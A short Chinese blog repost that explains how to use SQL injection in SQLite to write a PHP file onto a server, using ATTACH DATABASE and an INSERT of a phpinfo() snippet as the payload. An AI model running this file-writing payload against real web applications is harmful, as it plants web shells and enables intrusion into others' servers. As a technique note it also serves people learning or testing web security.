首页 > 数据库技术 > 详细

sqlite getshell

时间:2018-06-21 13:24:35      阅读:205      评论:0      收藏:0      [点我收藏+]
sqlite getshell

0x00 sqlite简述

SQLite是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库一样,您不需要在系统中配置。
就像其他数据库,SQLite 引擎不是一个独立的进程,可以按应用程序需求进行静态或动态连接。SQLite 直接访问其存储文件。

0x01 sqlite getshell

在存在sql注入或者是存在sql语句执行的地方执行一下代码:

ATTACH DATABASE ‘23.php‘ AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (‘<?php phpinfo()?>‘);

会生成一个23.php,具体路径要根据实际情况而定,其代码就是<?php phpinfo()?>
技术分享图片

sqlite getshell

原文:http://blog.51cto.com/13770310/2131241

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!